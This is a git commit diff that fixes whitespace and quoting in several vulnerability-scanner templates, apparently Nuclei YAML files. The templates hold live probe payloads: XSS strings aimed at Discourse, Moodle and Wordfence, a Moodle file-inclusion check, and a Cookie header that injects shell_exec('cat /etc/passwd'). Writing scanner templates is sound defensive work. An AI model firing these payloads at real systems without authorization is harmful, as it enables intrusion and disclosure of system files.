Fix syntax

patch-1
Fabian Affolter 2020-05-25 00:19:21 +02:00
parent a6b993ccbd
commit 4404138e70
No known key found for this signature in database
GPG Key ID: E23CD2DD36A4397F
9 changed files with 19 additions and 20 deletions

View File

@ -16,7 +16,7 @@ requests:
matchers:
- type: word
words:
- '<H1>OK</H1>'
- "<H1>OK</H1>"
part: body
- type: status
status:

View File

@ -3,17 +3,17 @@ id: Discourse XSS
info:
name: Discourse CMS XSS
author: madrobot
severity: medium
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\"><svg/onload=alert(1337)>"
- '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\"><svg/onload=alert(1337)>'
matchers:
- type: status
status:
- 200
- 200
- type: word
words:
- "<svg/onload=alert(1337)>"
- "<svg/onload=alert(1337)>"
part: body

View File

@ -1,4 +1,5 @@
id: moodle-filter-jmol-lfi
info:
name: Moodle filter_jmol LFI
author: madrobot
@ -11,8 +12,8 @@ requests:
matchers:
- type: status
status:
- 200
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
- "root:[x*]:0:0:"
part: body

View File

@ -3,7 +3,7 @@ id: moodle-filter-jmol-xss
info:
name: Moodle filter_jmol XSS
author: madrobot
severity: medium
severity: medium
requests:
- method: GET
@ -12,8 +12,8 @@ requests:
matchers:
- type: status
status:
- 200
- 200
- type: word
words:
- "\"};alert(1337);//"
- '\"};alert(1337);//'
part: body

View File

@ -1,12 +1,10 @@
id: open-redirect
info:
name: Open Redirect Detection
author: Elmahdi & @pxmme1337 & @Regala_ & @andirrahmani1
severity: low
severity: Low
requests:
- method: GET

View File

@ -10,12 +10,12 @@ requests:
path:
- "{{BaseURL}}/"
headers:
Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"
Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"
matchers:
- type: status
status:
- 200
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
- "root:[x*]:0:0:"
part: body

View File

@ -12,5 +12,5 @@ requests:
matchers:
- type: word
words:
- "DB_NAME"
- "DB_NAME"
part: body

View File

@ -3,7 +3,7 @@ id: wordpress-wordfence-xss
info:
name: WordPress Wordfence 7.4.6 Cross Site Scripting
author: madrobot
severity: medium
severity: medium
requests:
- method: GET
@ -12,5 +12,5 @@ requests:
matchers:
- type: word
words:
- "<svg/onload=alert(1337)>"
- "<svg/onload=alert(1337)>"
part: body

View File

@ -9,7 +9,7 @@ requests:
- method: GET
# Example of sending some headers to the servers
headers:
# md5 hash of melbadry9
# MD5 hash of melbadry9
X-Forwarded-Host: "0021e78f48fe6525798294b7711c6f72.com"
path:
- "{{BaseURL}}/"